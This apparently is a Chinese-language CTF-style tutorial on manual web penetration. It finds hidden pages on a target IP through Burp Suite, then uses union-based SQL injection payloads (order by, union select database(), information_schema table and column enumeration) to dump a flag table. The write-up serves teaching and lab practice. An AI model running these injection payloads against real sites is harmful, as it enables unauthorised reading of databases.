手工注入基本思路
目录
-
信息泄露
- 手工注入
渗透思路
1. 返回包信息中泄露重要目录
(1)访问http://112.44.218.141:2014是一个空白页面,开始想到的就是查看robots,然后御剑目录扫描都没有得到有发现目录;然后就使用burp截包,可以看到提示目录welcome_solkdjiejq.php

(2)访问http://112.44.218.141:2014/welcome_solkdjiejq.php得到flag(flag理解为web中一个重要信息):

(3)查看源码得到一个目录/system_jioqwjod.php

访问提示只用本机可以登录

(4)访问http://112.44.218.141:2014/system_jioqwjod.php使用burp截包得到flag:

另外得到location: system_skkkwwwwqad/index.php
2.SQL注入
访问http://112.44.218.141:2014/system_skkkwwwwqad/index.php点击report1
(1)在url后添加一个’报错,存在报错注入点

(2)判断列数使用oder by n#

Order by 2#回显正常

Order by 3#回显错位,那么应该为2列;

(3)判断回显为
id=-1 union select 88,99#回显为第二列位置

(4)暴数据库http://112.44.218.141:2014/system_skkkwwwwqad/index.php?id=-2 union select 1,database()#

(5)暴数据表
暴数据库news下的第一个表f3aagg:
id=-2 union select 1,(select table_name from information_schema.tables where table_schema="news" limit 0,1)#

第二个表news:
id=-2 union select 1,(select table_name from information_schema.tables where table_schema="news" limit 1,1)#

(6)暴表f3aagg下的字段为f3gg1
id=-2 union select 1,(select column_name from information_schema.columns where table_name="f3aagg" limit 0,1)#

(7)查看内容得到flag{eccbc87e4b5ce2fe28308fd9f2a7baf3}
id=-2 union select 1,(select * from f3aagg limit 0,1)#

这就是sql注入基本的完整思路,按照这样方法可以再查看其它表、字段信息;

浙公网安备 33010602011771号